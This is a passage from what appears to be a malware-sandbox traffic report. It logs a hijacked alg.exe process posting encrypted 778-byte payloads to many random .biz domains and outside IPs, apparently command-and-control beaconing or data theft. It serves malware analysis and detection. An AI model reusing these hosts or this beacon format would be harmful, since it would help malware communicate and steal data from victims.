                                                                                                                                                                                                                                                                                                                                                                                                                  Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.524463892 CET778OUTData Raw: c9 62 6b 05 8a ad 1d 74 fe 02 00 00 c9 f5 0b 86 e7 2b 63 81 3c c1 a5 97 14 b5 b2 03 db d0 98 f3 1e a3 ca 4f dc 7f e2 a0 35 bd 4f 64 9e 08 48 0e 96 73 9c b9 a5 44 ed 09 6e 5a a0 a1 26 7f 65 0e c5 9a 11 b1 c2 6b 16 68 db 36 8b 83 63 a6 69 5d eb e6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: bkt+c<O5OdHsDnZ&ekh6ci]4*a:`>gJwUSF'"y]dr~.v@ O(#.js'OIEMYK.RAY]eNHsgov7i?#K0+O!v6
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:54.967310905 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=86ca7775915f6bdc14e9ce49cbda3580|155.94.241.188|1730130654|1730130654|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  25192.168.2.54999944.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.584899902 CET347OUTPOST /ql HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.584944963 CET778OUTData Raw: 1a 6c 84 7d 81 98 18 bc fe 02 00 00 b3 83 dd e8 f2 16 1d 8a 71 8c 64 0c ac d3 f1 cb 27 ed f0 44 60 d1 0a 1b 8d 04 c0 f5 b1 8f 1f 8e 04 10 5f 9b d2 d9 da 2f b9 c7 a3 f1 5f 06 64 56 43 1f 89 2d 4b ae 51 e9 f2 49 a6 b4 de 0e c3 f6 51 dd 36 63 66 4c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: l}qd'D`_/_dVC-KQIQ6cfLl+z7pHEg"+2%8-\Yu;wLKrl!Y~2n.C<w5pSkr;2`GED#E*f
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.242321968 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=08fc88269762d7a755c2595166b34a20|155.94.241.188|1730130656|1730130656|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  26192.168.2.55000154.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.591741085 CET347OUTPOST /swl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.591767073 CET778OUTData Raw: a7 9c ed da 27 f7 94 05 fe 02 00 00 76 ae dc 8a c9 e6 bc f2 62 60 42 d1 eb dd 1a 1e 28 18 83 00 fe 8d 54 ae 42 64 96 18 67 3d 17 65 cc 8b 18 df 86 c3 a7 3c f4 90 b4 ef 40 74 59 d7 01 a2 ee ab 4d 92 53 66 e8 de b5 5b 17 19 13 4f 9c e8 d0 60 b5 33
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 'vb`B(TBdg=e<@tYMSf[O`3?1rq82] y%E8*Nag'1Uv0\%9639"W).!fhtR}epyw)o~Z"c,>:d&%j!FDl
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.420901060 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=558f48b19845872a424e6cb87299d6ae|155.94.241.188|1730130657|1730130657|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  27192.168.2.55000235.164.78.200802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.635310888 CET349OUTPOST /oekfiuj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.635310888 CET778OUTData Raw: 33 b4 53 01 85 c2 63 67 fe 02 00 00 81 e3 50 8c cb 12 12 92 3c 18 10 bd 83 1f 65 f1 7a a1 4d 4a d8 49 68 3a 55 eb 70 65 14 41 50 80 ad d4 19 7f c7 26 63 fe d0 d5 5a c4 ed f7 8b 4e 82 80 06 7b 98 6b a3 f8 82 e9 11 0e 9a 23 79 e4 4b c9 b7 4f 90 b6
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 3ScgP<ezMJIh:UpeAP&cZN{k#yKOE 8zO{2pE(6hH.Y9l 3!@f27In JBT,D,giO&n-B5;Y6'DmIrydlH w.
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.464307070 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5bda80ace70fedb4d5cffeeeee0124b4|155.94.241.188|1730130658|1730130658|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  28192.168.2.5500033.94.10.34802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.655952930 CET346OUTPOST /e HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.655973911 CET778OUTData Raw: 5d 37 44 3d 25 63 74 d4 fe 02 00 00 a1 b4 e3 67 24 b2 63 52 d0 09 49 c0 cc 3c 34 06 c3 57 b6 b4 43 c8 c7 47 ab 30 6f 86 fc 30 45 6b 74 b1 af 20 af ec 18 ec 64 e5 ec 20 6d 6e 4d 8a f7 26 66 6c 8f e1 cf 05 f9 31 8f dd 42 d7 a5 8b d4 8a ef 9f d8 88
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ]7D=%ctg$cRI<4WCG0o0Ekt d mnM&fl1B3e++*I,Aw+/CT=E:AV/r5&a4H33A;N8JzeYyT oNns]|&f5%iX8DBTyc&XF#
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.331190109 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:50:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=af7c045dc33671baf90c6efe1935adbe|155.94.241.188|1730130659|1730130659|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  29192.168.2.550004165.160.15.20802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.546041965 CET348OUTPOST /inljiti HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.546065092 CET778OUTData Raw: b8 b9 2d da 69 e9 15 f9 fe 02 00 00 8f 35 e1 49 99 97 1a 93 2f 9b 58 a5 b4 96 1c 3a 60 c3 05 18 0c 14 f0 4d db c7 d9 eb c3 ec d7 97 5c d5 a2 e9 67 ea dc 1e ef 74 65 70 f9 70 3b 02 4b ab 3d 41 83 22 77 21 de 1d 4f bf 48 67 ed 7f 7b 35 2c d0 28 69
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: -i5I/X:`M\gtepp;K=A"w!OHg{5,(iA`k)tVU|q{ap9*Wys@k|2eAlso_m3]b76_FNI<oYj?V}k1Y8^VeGU[fV.Z6Tx]gOL`A=._It
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.382225990 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.437275887 CET347OUTPOST /afgoll HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.437294960 CET778OUTData Raw: 15 37 dd 77 f6 c5 df af fe 02 00 00 e6 d8 ad c4 ff 4b b2 12 d4 e3 8c 84 cb f0 ff e5 9e 3f 2b d9 ce c0 ac 26 db e1 81 3d 53 08 5d 90 45 18 75 cc 96 ed 6a 4c e8 f6 8c 39 5a ff 3a af 2e 67 a3 88 af ea 1f 41 c8 63 43 72 a3 95 ed 8a c4 83 b5 80 e2 91
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 7wK?+&=S]EujL9Z:.gAcCr}klWytEaeB!p^|g\X\oyNgEuIJ~sE1?z`>.N?@aC&(R#hJy<SA8rY
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.682236910 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  30192.168.2.55000554.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974608898 CET346OUTPOST /y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.974636078 CET778OUTData Raw: db c3 11 0a a6 aa c7 e0 fe 02 00 00 0f 53 13 8c 8c db 63 6c 9a 54 4c 1e a3 c3 87 72 ba 05 c5 19 d1 cf e9 c3 f5 cb 2a 8c 3e 8d 15 7a 19 06 41 4d 82 e1 7c f3 4e d1 8a 7d ac 76 7d 4d ba d0 fd 3e 30 ca 29 6f d1 41 ff dd 01 f2 05 d4 a4 bf 57 26 86 ab
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: SclTLr*>zAM|N}v}M>0)oAW&*<T=IP!W>6a#`$~./.7VmUu(92y9d!=vg(~u`UJc(2Z|d7HTig`K=/k
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.809478998 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8ef1b05bb23c3bcd9ce71c05f225a40b|155.94.241.188|1730130661|1730130661|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  31192.168.2.55000634.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271425962 CET353OUTPOST /qtybvvfgdyqy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:03.271425962 CET778OUTData Raw: 28 84 22 e2 c7 dd bb 72 fe 02 00 00 e0 80 e6 0f 93 7e eb a0 16 80 a1 05 d3 f9 c8 a7 69 6c 6a 7f 5e 63 67 e3 6e 39 9d 5d 6a 51 07 84 9b 44 ae 7d b6 7c 53 55 02 b9 0f d1 8e bf 16 44 75 ec 04 0d 94 2d af 44 7a b6 e6 a2 f9 19 2e f9 af b4 91 6b e1 11
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ("r~ilj^cgn9]jQD}|SUDu-Dz.kTu|amze]Wo;hC%*s,E;Cz59x>K:]`r28:~Ty'$JV%L!Sj&@3OgE
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.090595961 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=ef7cdfbd05af0118a88500fe0c75e5f4|155.94.241.188|1730130663|1730130663|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  32192.168.2.55000754.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378541946 CET359OUTPOST /bdnjndwcxvdfjwt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.378563881 CET778OUTData Raw: 4e f3 49 e9 d6 94 f7 66 fe 02 00 00 94 0c 72 cd 61 9a 26 ea c2 f0 7d e9 97 2f 04 cf eb 45 03 f9 6c c9 42 09 9f 2f 90 99 57 fa 1d 99 bb ca cb 8b 66 e3 b4 fb da f2 18 a7 86 c2 00 a4 b1 78 29 cb c3 70 5c b8 8c b5 31 88 71 00 24 7d 5a 09 c0 d5 89 70
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: NIfra&}/ElB/Wfx)p\1q$}Zp=_I-t"|qOB&)T.0ADv(*BQm;s#%PCP#6Eqb!\VmnZZ==g+?<aw=}yFir_;r
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.209378004 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=70e2d56aae9c68e5436d319b98194255|155.94.241.188|1730130665|1730130665|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  33192.168.2.55000818.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.418046951 CET351OUTPOST /krccyasm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: wllvnzb.biz
